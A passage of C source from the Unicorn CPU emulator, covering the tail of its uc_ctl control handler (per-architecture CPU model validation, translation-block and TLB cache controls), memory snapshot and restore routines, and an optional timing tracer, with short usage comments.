if (model <= UC_CPU_ARM_CORTEX_A15 && model >= UC_CPU_ARM_CORTEX_A7) { err = UC_ERR_ARG; break; } } } else if (uc->arch == UC_ARCH_ARM64) { if (model >= UC_CPU_ARM64_ENDING) { err = UC_ERR_ARG; break; } } else if (uc->arch == UC_ARCH_MIPS) { if (uc->mode & UC_MODE_32 && model >= UC_CPU_MIPS32_ENDING) { err = UC_ERR_ARG; break; } if (uc->mode & UC_MODE_64 && model >= UC_CPU_MIPS64_ENDING) { err = UC_ERR_ARG; break; } } else if (uc->arch == UC_ARCH_PPC) { // UC_MODE_PPC32 == UC_MODE_32 if (uc->mode & UC_MODE_32 && model >= UC_CPU_PPC32_ENDING) { err = UC_ERR_ARG; break; } if (uc->mode & UC_MODE_64 && model >= UC_CPU_PPC64_ENDING) { err = UC_ERR_ARG; break; } } else if (uc->arch == UC_ARCH_RISCV) { if (uc->mode & UC_MODE_32 && model >= UC_CPU_RISCV32_ENDING) { err = UC_ERR_ARG; break; } if (uc->mode & UC_MODE_64 && model >= UC_CPU_RISCV64_ENDING) { err = UC_ERR_ARG; break; } } else if (uc->arch == UC_ARCH_S390X) { if (model >= UC_CPU_S390X_ENDING) { err = UC_ERR_ARG; break; } } else if (uc->arch == UC_ARCH_SPARC) { if (uc->mode & UC_MODE_32 && model >= UC_CPU_SPARC32_ENDING) { err = UC_ERR_ARG; break; } if (uc->mode & UC_MODE_64 && model >= UC_CPU_SPARC64_ENDING) { err = UC_ERR_ARG; break; } } else if (uc->arch == UC_ARCH_M68K) { if (model >= UC_CPU_M68K_ENDING) { err = UC_ERR_ARG; break; } } else { err = UC_ERR_ARG; break; } uc->cpu_model = model; err = UC_ERR_OK; } break; } case UC_CTL_TB_REQUEST_CACHE: { UC_INIT(uc); if (rw == UC_CTL_IO_READ_WRITE) { uint64_t addr = va_arg(args, uint64_t); uc_tb *tb = va_arg(args, uc_tb *); err = uc->uc_gen_tb(uc, addr, tb); } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; } case UC_CTL_TB_REMOVE_CACHE: { UC_INIT(uc); if (rw == UC_CTL_IO_WRITE) { uint64_t addr = va_arg(args, uint64_t); uint64_t end = va_arg(args, uint64_t); if (end <= addr) { err = UC_ERR_ARG; } else { uc->uc_invalidate_tb(uc, addr, end - addr); } } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; } case UC_CTL_TB_FLUSH: UC_INIT(uc); if (rw == UC_CTL_IO_WRITE) { uc->tb_flush(uc); } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; case UC_CTL_TLB_FLUSH: UC_INIT(uc); if (rw == UC_CTL_IO_WRITE) { uc->tcg_flush_tlb(uc); } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; case UC_CTL_TLB_TYPE: { UC_INIT(uc); if (rw == UC_CTL_IO_WRITE) { int mode = va_arg(args, int); err = uc->set_tlb(uc, mode); } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; } case UC_CTL_TCG_BUFFER_SIZE: { if (rw == UC_CTL_IO_WRITE) { uint32_t size = va_arg(args, uint32_t); uc->tcg_buffer_size = size; } else { UC_INIT(uc); uint32_t *size = va_arg(args, uint32_t *); *size = uc->tcg_buffer_size; restore_jit_state(uc); } break; } case UC_CTL_CONTEXT_MODE: UC_INIT(uc); if (rw == UC_CTL_IO_WRITE) { int mode = va_arg(args, int); uc->context_content = mode; err = UC_ERR_OK; } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; default: err = UC_ERR_ARG; break; } va_end(args); return err; } static uc_err uc_snapshot(struct uc_struct *uc) { if (uc->snapshot_level == INT32_MAX) { return UC_ERR_RESOURCE; } uc->snapshot_level++; return UC_ERR_OK; } static uc_err uc_restore_latest_snapshot(struct uc_struct *uc) { MemoryRegion *subregion, *subregion_next, *mr, *initial_mr; int level; QTAILQ_FOREACH_SAFE(subregion, &uc->system_memory->subregions, subregions_link, subregion_next) { uc->memory_filter_subregions(subregion, uc->snapshot_level); if (subregion->priority >= uc->snapshot_level || (!subregion->terminates && QTAILQ_EMPTY(&subregion->subregions))) { uc->memory_unmap(uc, subregion); } } 
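/*
 * Illustrative caller-side view (not part of this file): memory
 * snapshots are driven through the context API once enabled, e.g.
 *
 *     uc_ctl(uc, UC_CTL_WRITE(UC_CTL_CONTEXT_MODE, 1),
 *            UC_CTL_CONTEXT_CPU | UC_CTL_CONTEXT_MEMORY);
 *     uc_context_save(uc, ctx);    // raises uc->snapshot_level
 *     // ... emulate, mutate memory ...
 *     uc_context_restore(uc, ctx); // unwinds via this function
 */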
for (size_t i = uc->unmapped_regions->len; i-- > 0;) { mr = g_array_index(uc->unmapped_regions, MemoryRegion *, i); // same dirty hack as in memory_moveout see qemu/softmmu/memory.c initial_mr = QTAILQ_FIRST(&mr->subregions); if (!initial_mr) { initial_mr = mr; } /* same dirty hack as in memory_moveout see qemu/softmmu/memory.c */ level = (intptr_t)mr->container; mr->container = NULL; if (level < uc->snapshot_level) { break; } if (memory_overlap(uc, mr->addr, int128_get64(mr->size))) { return UC_ERR_MAP; } uc->memory_movein(uc, mr); uc->memory_filter_subregions(mr, uc->snapshot_level); if (initial_mr != mr && QTAILQ_EMPTY(&mr->subregions)) { uc->memory_unmap(uc, mr); } mem_map(uc, initial_mr); g_array_remove_range(uc->unmapped_regions, i, 1); } uc->snapshot_level--; return UC_ERR_OK; } #ifdef UNICORN_TRACER uc_tracer *get_tracer() { static uc_tracer tracer; return &tracer; } void trace_start(uc_tracer *tracer, trace_loc loc) { tracer->starts[loc] = get_clock(); } void trace_end(uc_tracer *tracer, trace_loc loc, const char *fmt, ...) { va_list args; int64_t end = get_clock(); va_start(args, fmt); vfprintf(stderr, fmt, args); va_end(args); fprintf(stderr, "%.6fus\n", (double)(end - tracer->starts[loc]) / (double)(1000)); } #endif
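/*
 * Illustrative tracer usage (only meaningful when built with
 * UNICORN_TRACER; TRACE_LOC stands for one of the trace_loc enumerators
 * defined elsewhere):
 *
 *     uc_tracer *tracer = get_tracer();
 *     trace_start(tracer, TRACE_LOC);
 *     // ... timed work ...
 *     trace_end(tracer, TRACE_LOC, "work took: ");
 */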